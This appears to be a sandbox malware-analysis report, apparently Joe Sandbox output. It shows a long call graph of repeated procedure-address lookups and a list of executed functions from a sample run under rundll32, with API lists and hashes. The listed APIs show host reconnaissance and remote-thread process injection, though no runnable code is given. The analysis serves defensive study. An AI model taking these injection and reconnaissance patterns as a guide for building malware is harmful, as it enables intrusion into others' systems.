20440->20441 20442 29f3b8ecce0 LdrGetProcedureAddress 20441->20442 20443 29f3b8f19e0 20442->20443 20444 29f3b8ecce0 LdrGetProcedureAddress 20443->20444 20445 29f3b8f19f8 20444->20445 20446 29f3b8ecce0 LdrGetProcedureAddress 20445->20446 20447 29f3b8f1a10 20446->20447 20448 29f3b8ecce0 LdrGetProcedureAddress 20447->20448 20449 29f3b8f1a28 20448->20449 20450 29f3b8ecce0 LdrGetProcedureAddress 20449->20450 20451 29f3b8f1a40 20450->20451 20452 29f3b8ecce0 LdrGetProcedureAddress 20451->20452 20453 29f3b8f1a58 20452->20453 20454 29f3b8ecce0 LdrGetProcedureAddress 20453->20454 20455 29f3b8f1a70 20454->20455 20456 29f3b8ecce0 LdrGetProcedureAddress 20455->20456 20457 29f3b8f1a88 20456->20457 20458 29f3b8ecce0 LdrGetProcedureAddress 20457->20458 20459 29f3b8f1aa0 20458->20459 20460 29f3b8ecce0 LdrGetProcedureAddress 20459->20460 20461 29f3b8f1ab8 20460->20461 20462 29f3b8ecce0 LdrGetProcedureAddress 20461->20462 20463 29f3b8f1ad0 20462->20463 20464 29f3b8ecce0 LdrGetProcedureAddress 20463->20464 20465 29f3b8f1ae8 20464->20465 20466 29f3b8ecce0 LdrGetProcedureAddress 20465->20466 20467 29f3b8f1b00 20466->20467 20468 29f3b8ecce0 LdrGetProcedureAddress 20467->20468 20469 29f3b8f1b18 20468->20469 20470 29f3b8ecce0 LdrGetProcedureAddress 20469->20470 20471 29f3b8f1b30 20470->20471 20472 29f3b8ecce0 LdrGetProcedureAddress 20471->20472 20473 29f3b8f1b48 20472->20473 20474 29f3b8ecce0 LdrGetProcedureAddress 20473->20474 20475 29f3b8f1b60 20474->20475 20476 29f3b8ecce0 LdrGetProcedureAddress 20475->20476 20477 29f3b8f1b78 20476->20477 20478 29f3b8ecce0 LdrGetProcedureAddress 20477->20478 20479 29f3b8f1b90 20478->20479 20480 29f3b8ecce0 LdrGetProcedureAddress 20479->20480 20481 29f3b8f1bc1 20480->20481 20482 29f3b8ecce0 LdrGetProcedureAddress 20481->20482 20483 29f3b8f1bf2 20482->20483 20484 29f3b8ecce0 LdrGetProcedureAddress 20483->20484 20485 29f3b8f1c23 20484->20485 20486 29f3b8ecce0 LdrGetProcedureAddress 20485->20486 20487 29f3b8f1c54 20486->20487 20488 29f3b8ecce0 LdrGetProcedureAddress 20487->20488 20489 29f3b8f1c85 20488->20489 20490 29f3b8ecce0 LdrGetProcedureAddress 20489->20490 20491 29f3b8f1cb6 20490->20491 20492 29f3b8ecce0 LdrGetProcedureAddress 20491->20492 20493 29f3b8f1ce7 20492->20493 20494 29f3b8ecce0 LdrGetProcedureAddress 20493->20494 20495 29f3b8f1d18 20494->20495 20496 29f3b8ecce0 LdrGetProcedureAddress 20495->20496 20497 29f3b8f1d49 20496->20497 20498 29f3b8ecce0 LdrGetProcedureAddress 20497->20498 20499 29f3b8f1d7a 20498->20499 20500 29f3b8ecce0 LdrGetProcedureAddress 20499->20500 20501 29f3b8f1dab 20500->20501 20502 29f3b8ecce0 LdrGetProcedureAddress 20501->20502 20503 29f3b8f1ddc 20502->20503 20504 29f3b8ecce0 LdrGetProcedureAddress 20503->20504 20505 29f3b8f1e0d 20504->20505 20506 29f3b8ecce0 LdrGetProcedureAddress 20505->20506 20507 29f3b8f1e3e 20506->20507 20508 29f3b8ecce0 LdrGetProcedureAddress 20507->20508 20509 29f3b8f1e6f 20508->20509 20510 29f3b8ecce0 LdrGetProcedureAddress 20509->20510 20511 29f3b8f1ea0 20510->20511 20512 29f3b8ecce0 LdrGetProcedureAddress 20511->20512 20513 29f3b8f1ed1 20512->20513 20514 29f3b8ecce0 LdrGetProcedureAddress 20513->20514 20515 29f3b8f1f02 20514->20515 20516 29f3b8ecce0 LdrGetProcedureAddress 20515->20516 20517 29f3b8f1f33 20516->20517 20518 29f3b8ecce0 LdrGetProcedureAddress 20517->20518 20519 29f3b8f1f64 20518->20519 20520 29f3b8ecce0 LdrGetProcedureAddress 20519->20520 20521 29f3b8f1f95 20520->20521 20522 29f3b8ecce0 LdrGetProcedureAddress 20521->20522 20523 29f3b8f1fc6 20522->20523 20524 29f3b8ecce0 LdrGetProcedureAddress 20523->20524 20525 29f3b8f1ff7 20524->20525 20526 29f3b8ecce0 LdrGetProcedureAddress 20525->20526 20527 29f3b8f2028 20526->20527 20528 29f3b8ecce0 LdrGetProcedureAddress 20527->20528 20529 29f3b8f2059 20528->20529 20530 29f3b8ecce0 LdrGetProcedureAddress 20529->20530 20531 29f3b8f208a 20530->20531 20532 29f3b8ecce0 LdrGetProcedureAddress 20531->20532 20533 29f3b8f20bb 20532->20533 20534 29f3b8ecce0 LdrGetProcedureAddress 20533->20534 20535 29f3b8f20ec 20534->20535 20536 29f3b8ecce0 LdrGetProcedureAddress 20535->20536 20537 29f3b8f211d 20536->20537 20538 29f3b8ecce0 LdrGetProcedureAddress 20537->20538 20539 29f3b8f214e 20538->20539 20540 29f3b8ecce0 LdrGetProcedureAddress 20539->20540 20541 29f3b8f217f 20540->20541 20542 29f3b8ecce0 LdrGetProcedureAddress 20541->20542 20543 29f3b8f21b0 20542->20543 20544 29f3b8ecce0 LdrGetProcedureAddress 20543->20544 20544->20375 20546 29f3b8f01ce 20545->20546 20547 29f3b8ecce0 LdrGetProcedureAddress 20546->20547 20748 29f3b8f0e4a 20546->20748 20548 29f3b8f0228 20547->20548 20549 29f3b8ecce0 LdrGetProcedureAddress 20548->20549 20550 29f3b8f0243 20549->20550 20551 29f3b8ecce0 LdrGetProcedureAddress 20550->20551 20552 29f3b8f026c 20551->20552 20553 29f3b8ecce0 LdrGetProcedureAddress 20552->20553 20554 29f3b8f028b 20553->20554 20555 29f3b8ecce0 LdrGetProcedureAddress 20554->20555 20556 29f3b8f02aa 20555->20556 20557 29f3b8ecce0 LdrGetProcedureAddress 20556->20557 20558 29f3b8f02c9 20557->20558 20559 29f3b8ecce0 LdrGetProcedureAddress 20558->20559 20560 29f3b8f02e8 20559->20560 20561 29f3b8ecce0 LdrGetProcedureAddress 20560->20561 20562 29f3b8f0307 20561->20562 20563 29f3b8ecce0 LdrGetProcedureAddress 20562->20563 20564 29f3b8f0326 20563->20564 20565 29f3b8ecce0 LdrGetProcedureAddress 20564->20565 20566 29f3b8f0345 20565->20566 20567 29f3b8ecce0 LdrGetProcedureAddress 20566->20567 20568 29f3b8f0364 20567->20568 20569 29f3b8ecce0 LdrGetProcedureAddress 20568->20569 20570 29f3b8f0383 20569->20570 20571 29f3b8ecce0 LdrGetProcedureAddress 20570->20571 20572 29f3b8f03a2 20571->20572 20573 29f3b8ecce0 LdrGetProcedureAddress 20572->20573 20574 29f3b8f03c1 20573->20574 20575 29f3b8ecce0 LdrGetProcedureAddress 20574->20575 20576 29f3b8f03e0 20575->20576 20577 29f3b8ecce0 LdrGetProcedureAddress 20576->20577 20578 29f3b8f03ff 20577->20578 20579 29f3b8ecce0 LdrGetProcedureAddress 20578->20579 20580 29f3b8f041e 20579->20580 20581 29f3b8ecce0 LdrGetProcedureAddress 20580->20581 20582 29f3b8f043d 20581->20582 20583 29f3b8ecce0 LdrGetProcedureAddress 20582->20583 20584 29f3b8f045c 20583->20584 20585 29f3b8ecce0 LdrGetProcedureAddress 20584->20585 20586 29f3b8f047b 20585->20586 20587 29f3b8ecce0 LdrGetProcedureAddress 20586->20587 20588 29f3b8f049a 20587->20588 20589 29f3b8ecce0 LdrGetProcedureAddress 20588->20589 20590 29f3b8f04b9 20589->20590 20591 29f3b8ecce0 LdrGetProcedureAddress 20590->20591 20592 29f3b8f04d8 20591->20592 20593 29f3b8ecce0 LdrGetProcedureAddress 20592->20593 20594 29f3b8f04f7 20593->20594 20595 29f3b8ecce0 LdrGetProcedureAddress 20594->20595 20596 29f3b8f0516 20595->20596 20597 29f3b8ecce0 LdrGetProcedureAddress 20596->20597 20598 29f3b8f0535 20597->20598 20599 29f3b8ecce0 LdrGetProcedureAddress 20598->20599 20600 29f3b8f0554 20599->20600 20601 29f3b8ecce0 LdrGetProcedureAddress 20600->20601 20602 29f3b8f0573 20601->20602 20603 29f3b8ecce0 LdrGetProcedureAddress 20602->20603 20604 29f3b8f0592 20603->20604 20605 29f3b8ecce0 LdrGetProcedureAddress 20604->20605 20606 29f3b8f05b1 20605->20606 20607 29f3b8ecce0 LdrGetProcedureAddress 20606->20607 20608 29f3b8f05d0 20607->20608 20609 29f3b8ecce0 LdrGetProcedureAddress 20608->20609 20610 29f3b8f05ef 20609->20610 20611 29f3b8ecce0 LdrGetProcedureAddress 20610->20611 20612 29f3b8f060e 20611->20612 20613 29f3b8ecce0 LdrGetProcedureAddress 20612->20613 20614 29f3b8f062d 20613->20614 20615 29f3b8ecce0 LdrGetProcedureAddress 20614->20615 20616 29f3b8f064c 20615->20616 20617 29f3b8ecce0 LdrGetProcedureAddress 20616->20617 20618 29f3b8f066b 20617->20618 20619 29f3b8ecce0 LdrGetProcedureAddress 20618->20619 20620 29f3b8f068a 20619->20620 20621 29f3b8ecce0 LdrGetProcedureAddress 20620->20621 20622 29f3b8f06a9 20621->20622 20623 29f3b8ecce0 LdrGetProcedureAddress 20622->20623 20624 29f3b8f06c8 20623->20624 20625 29f3b8ecce0 LdrGetProcedureAddress 20624->20625 20626 29f3b8f06e7 20625->20626 20627 29f3b8ecce0 LdrGetProcedureAddress 20626->20627 20628 29f3b8f0706 20627->20628 20629 29f3b8ecce0 LdrGetProcedureAddress 20628->20629 20630 29f3b8f0725 20629->20630 20631 29f3b8ecce0 LdrGetProcedureAddress 20630->20631 20632 29f3b8f0744 20631->20632 20633 29f3b8ecce0 LdrGetProcedureAddress 20632->20633 20634 29f3b8f0763 20633->20634 20635 29f3b8ecce0 LdrGetProcedureAddress 20634->20635 20636 29f3b8f0782 20635->20636 20637 29f3b8ecce0 LdrGetProcedureAddress 20636->20637 20638 29f3b8f07a1 20637->20638 20639 29f3b8ecce0 LdrGetProcedureAddress 20638->20639 20640 29f3b8f07c0 20639->20640 20641 29f3b8ecce0 LdrGetProcedureAddress 20640->20641 20642 29f3b8f07df 20641->20642 20643 29f3b8ecce0 LdrGetProcedureAddress 20642->20643 20644 29f3b8f07fe 20643->20644 20645 29f3b8ecce0 LdrGetProcedureAddress 20644->20645 20646 29f3b8f081d 20645->20646 20647 29f3b8ecce0 LdrGetProcedureAddress 20646->20647 20648 29f3b8f083c 20647->20648 20649 29f3b8ecce0 LdrGetProcedureAddress 20648->20649 20650 29f3b8f085b 20649->20650 20651 29f3b8ecce0 LdrGetProcedureAddress 20650->20651 20652 29f3b8f087a 20651->20652 20653 29f3b8ecce0 LdrGetProcedureAddress 20652->20653 20654 29f3b8f0899 20653->20654 20655 29f3b8ecce0 LdrGetProcedureAddress 20654->20655 20656 29f3b8f08b8 20655->20656 20657 29f3b8ecce0 LdrGetProcedureAddress 20656->20657 20658 29f3b8f08d7 20657->20658 20659 29f3b8ecce0 LdrGetProcedureAddress 20658->20659 20660 29f3b8f08f6 20659->20660 20661 29f3b8ecce0 LdrGetProcedureAddress 20660->20661 20662 29f3b8f0915 20661->20662 20663 29f3b8ecce0 LdrGetProcedureAddress 20662->20663 20664 29f3b8f0934 20663->20664 20665 29f3b8ecce0 LdrGetProcedureAddress 20664->20665 20666 29f3b8f0953 20665->20666 20667 29f3b8ecce0 LdrGetProcedureAddress 20666->20667 20668 29f3b8f0972 20667->20668 20669 29f3b8ecce0 LdrGetProcedureAddress 20668->20669 20670 29f3b8f0991 20669->20670 20671 29f3b8ecce0 LdrGetProcedureAddress 20670->20671 20672 29f3b8f09b0 20671->20672 20673 29f3b8ecce0 LdrGetProcedureAddress 20672->20673 20674 29f3b8f09cf 20673->20674 20675 29f3b8ecce0 LdrGetProcedureAddress 20674->20675 20676 29f3b8f09ee 20675->20676 20677 29f3b8ecce0 LdrGetProcedureAddress 20676->20677 20678 29f3b8f0a0d 20677->20678 20679 29f3b8ecce0 LdrGetProcedureAddress 20678->20679 20680 29f3b8f0a2c 20679->20680 20681 29f3b8ecce0 LdrGetProcedureAddress 20680->20681 20682 29f3b8f0a4b 20681->20682 20683 29f3b8ecce0 LdrGetProcedureAddress 20682->20683 20684 29f3b8f0a6a 20683->20684 20685 29f3b8ecce0 LdrGetProcedureAddress 20684->20685 20686 29f3b8f0a89 20685->20686 20687 29f3b8ecce0 LdrGetProcedureAddress 20686->20687 20688 29f3b8f0aa8 20687->20688 20689 29f3b8ecce0 LdrGetProcedureAddress 20688->20689 20690 29f3b8f0ac7 20689->20690 20691 29f3b8ecce0 LdrGetProcedureAddress 20690->20691 20692 29f3b8f0ae6 20691->20692 20693 29f3b8ecce0 LdrGetProcedureAddress 20692->20693 20694 29f3b8f0b05 20693->20694 20695 29f3b8ecce0 LdrGetProcedureAddress 20694->20695 20696 29f3b8f0b24 20695->20696 20697 29f3b8ecce0 LdrGetProcedureAddress 20696->20697 20698 29f3b8f0b43 20697->20698 20699 29f3b8ecce0 LdrGetProcedureAddress 20698->20699 20700 29f3b8f0b62 20699->20700 20701 29f3b8ecce0 LdrGetProcedureAddress 20700->20701 20702 29f3b8f0b81 20701->20702 20703 29f3b8ecce0 LdrGetProcedureAddress 20702->20703 20704 29f3b8f0ba0 20703->20704 20705 29f3b8ecce0 LdrGetProcedureAddress 20704->20705 20706 29f3b8f0bbf 20705->20706 20707 29f3b8ecce0 LdrGetProcedureAddress 20706->20707 20708 29f3b8f0bde 20707->20708 20709 29f3b8ecce0 LdrGetProcedureAddress 20708->20709 20710 29f3b8f0bfd 20709->20710 20711 29f3b8ecce0 LdrGetProcedureAddress 20710->20711 20712 29f3b8f0c1c 20711->20712 20713 29f3b8ecce0 LdrGetProcedureAddress 20712->20713 20714 29f3b8f0c3b 20713->20714 20715 29f3b8ecce0 LdrGetProcedureAddress 20714->20715 20716 29f3b8f0c5a 20715->20716 20717 29f3b8ecce0 LdrGetProcedureAddress 20716->20717 20718 29f3b8f0c79 20717->20718 20719 29f3b8ecce0 LdrGetProcedureAddress 20718->20719 20720 29f3b8f0c98 20719->20720 20721 29f3b8ecce0 LdrGetProcedureAddress 20720->20721 20722 29f3b8f0cb7 20721->20722 20723 29f3b8ecce0 LdrGetProcedureAddress 20722->20723 20724 29f3b8f0cd6 20723->20724 20725 29f3b8ecce0 LdrGetProcedureAddress 20724->20725 20726 29f3b8f0cf5 20725->20726 20727 29f3b8ecce0 LdrGetProcedureAddress 20726->20727 20728 29f3b8f0d14 20727->20728 20729 29f3b8ecce0 LdrGetProcedureAddress 20728->20729 20730 29f3b8f0d33 20729->20730 20731 29f3b8ecce0 LdrGetProcedureAddress 20730->20731 20732 29f3b8f0d52 20731->20732 20733 29f3b8ecce0 LdrGetProcedureAddress 20732->20733 20734 29f3b8f0d71 20733->20734 20735 29f3b8ecce0 LdrGetProcedureAddress 20734->20735 20736 29f3b8f0d90 20735->20736 20737 29f3b8ecce0 LdrGetProcedureAddress 20736->20737 20738 29f3b8f0daf 20737->20738 20739 29f3b8ecce0 LdrGetProcedureAddress 20738->20739 20740 29f3b8f0dce 20739->20740 20741 29f3b8ecce0 LdrGetProcedureAddress 20740->20741 20742 29f3b8f0ded 20741->20742 20743 29f3b8ecce0 LdrGetProcedureAddress 20742->20743 20744 29f3b8f0e0c 20743->20744 20745 29f3b8ecce0 LdrGetProcedureAddress 20744->20745 20746 29f3b8f0e2b 20745->20746 20747 29f3b8ecce0 LdrGetProcedureAddress 20746->20747 20747->20748 20748->20360

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 0000029F3B904D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 76 29f3b904d00-29f3b904daf GetUserNameW GetComputerNameExW 77 29f3b904db1-29f3b904dc1 call 29f3b90b4c0 76->77 78 29f3b904dc7-29f3b904df1 GetComputerNameExW call 29f3b914ad0 76->78 77->78 83 29f3b904df3-29f3b904e1a GetTokenInformation 78->83 84 29f3b904e58-29f3b904e92 call 29f3b912750 call 29f3b8fdfc0 78->84 85 29f3b904e1c-29f3b904e28 83->85 86 29f3b904e4e-29f3b904e53 call 29f3b914000 83->86 98 29f3b904e94-29f3b904ea5 call 29f3b913de0 84->98 99 29f3b904eaa-29f3b904ed1 GetNativeSystemInfo 84->99 87 29f3b904e2a-29f3b904e39 call 29f3b913de0 85->87 88 29f3b904e3e-29f3b904e49 call 29f3b913de0 85->88 86->84 87->88 88->86 98->99 101 29f3b904ed3-29f3b904ee6 99->101 102 29f3b904ee8-29f3b904eec 99->102 103 29f3b904f01-29f3b904f15 call 29f3b913de0 101->103 104 29f3b904f17-29f3b904f2d call 29f3b913de0 102->104 105 29f3b904eee-29f3b904efd 102->105 109 29f3b904f32-29f3b904f42 103->109 104->109 105->103 111 29f3b904f44-29f3b904f84 call 29f3b913b90 call 29f3b913de0 call 29f3b913b90 * 2 109->111 112 29f3b904f89-29f3b904fb9 GetAdaptersInfo 109->112 111->112 117 29f3b904fbb-29f3b904fdc call 29f3b90b4e0 * 2 112->117 118 29f3b904fdd-29f3b904fe3 112->118 118->117 121 29f3b904fe5-29f3b904ffd call 29f3b90b4c0 GetAdaptersInfo 118->121 121->117 128 29f3b904fff-29f3b90500c 121->128 131 29f3b905012-29f3b905015 128->131 131->117 132 29f3b905017-29f3b905018 131->132 133 29f3b90501f-29f3b905031 call 29f3b8e93e0 132->133 136 29f3b905033-29f3b905043 call 29f3b913de0 133->136 137 29f3b905045-29f3b90504c 133->137 136->133 137->117 139 29f3b905052-29f3b905062 call 29f3b913de0 137->139 139->131
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1596153048-0
                                                                                                                                                                                                                            • Opcode ID: fc528667e9177e2c198aa73658bdcfe4b0ce47abc5a9d58c6fb41e03184e1b56
                                                                                                                                                                                                                            • Instruction ID: b28abb9712da1afe79b65cd2eb6e205b63f69ed87284a011336d8653326d0c7b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc528667e9177e2c198aa73658bdcfe4b0ce47abc5a9d58c6fb41e03184e1b56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91A1E530218B848FEBD4BB14D9697FAB7E1FBD4301F40457DA44AC3291DA78DA45CB86
                                                                                                                                                                                                                            Function 0000000273F41380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62injectionsleepmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 143 273f41380-273f413cc Sleep VirtualAllocEx 144 273f41456-273f41466 143->144 145 273f413d2-273f41400 WriteProcessMemory 143->145 146 273f41402-273f4143a CreateRemoteThread 145->146 147 273f41453 145->147 146->144 148 273f4143c-273f4143e 146->148 147->144 149 273f4144e-273f41451 148->149 150 273f41440-273f41448 WaitForSingleObject 148->150 149->144 150->149
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3172812169-2766056989
                                                                                                                                                                                                                            • Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                            • Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605
                                                                                                                                                                                                                            Function 0000029F3B8FF3A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 215threadprocessCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                            • API String ID: 3779972765-4108050209
                                                                                                                                                                                                                            • Opcode ID: 9e1099e21e8aa8a75778dab0f0003b72168b0ca433e7e7463a7c69df624acbf5
                                                                                                                                                                                                                            • Instruction ID: 46a64b292ea0512da4c3bc41108d55d042a9d5c27f425ce5719e7fa374485aaa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1099e21e8aa8a75778dab0f0003b72168b0ca433e7e7463a7c69df624acbf5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D719F70218B888FE7D4EF68D459BAAB7D1FB88305F5046BDA44DC3291DB78D4068B46
                                                                                                                                                                                                                            Function 00007DF49BA40100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1593494447.00007DF49BA40000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF49BA40000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_7df49ba40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                            • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                            • Instruction ID: 12426e41f99379f5bf9499ca6e3bc7420db13de84a9169a75cf85952742d63e4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4671D131614A4C8FEF94EF5CC858BA937E1FB98315F10462AE81EC72A0DB74D954DB84
                                                                                                                                                                                                                            Function 0000029F3B8F8C60 Relevance: 3.2, APIs: 2, Instructions: 188COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Fiber$CreateDelete
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2527733159-0
                                                                                                                                                                                                                            • Opcode ID: 6af399a1dc89570af37a1901f8c16fa5b317a926a8c3e6f0b868bb979e7e6e26
                                                                                                                                                                                                                            • Instruction ID: 8b5d2e0876120d7ee1288e31d97f6ff13d9ba12ce6bae6571f8a6989a9f915e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af399a1dc89570af37a1901f8c16fa5b317a926a8c3e6f0b868bb979e7e6e26
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED5109306189448BE7E8BB28AD5937573D5FB58312F20077DE89AC31E1DA389C2386D5
                                                                                                                                                                                                                            Function 00007DF49BA40000 Relevance: 3.1, APIs: 2, Instructions: 88processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1593494447.00007DF49BA40000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF49BA40000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_7df49ba40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3280610774-0
                                                                                                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                            • Instruction ID: 5abd378179bb0ff7636c03aef329a95ab76dbbbbf588fc0a92e9be678559848e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B21CD3071494C8FEBA5EB6CCC58BEA33E2FB98310F404226D41EDB290DE759A449750
                                                                                                                                                                                                                            Function 0000029F3B8E1600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitThreadUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3424019298-0
                                                                                                                                                                                                                            • Opcode ID: 9a1514e0302c050ca97904b6743693543049edcd165f1a0e5e1e29fab2aaa942
                                                                                                                                                                                                                            • Instruction ID: df52469f3670ad0620f52a0779cf67737823fce6688d7188924976669336088f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a1514e0302c050ca97904b6743693543049edcd165f1a0e5e1e29fab2aaa942
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551D7742189484FE788FF28D9597B5B7E1FB56311F10426DE497C32A2CB38E812CB55
                                                                                                                                                                                                                            Function 0000029F3B8ECCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProcedure
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3653107232-0
                                                                                                                                                                                                                            • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                            • Instruction ID: df5da969d778b42ef61692358c555443ed11654958a53b53f4f84f1e9579fd71
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95310731618B485BD7E4AF08DC4A7BAB7E0FB85311F50066EE486C3351D635B8568BCB
                                                                                                                                                                                                                            Function 0000029F3B8F55C0 Relevance: .9, Instructions: 926COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
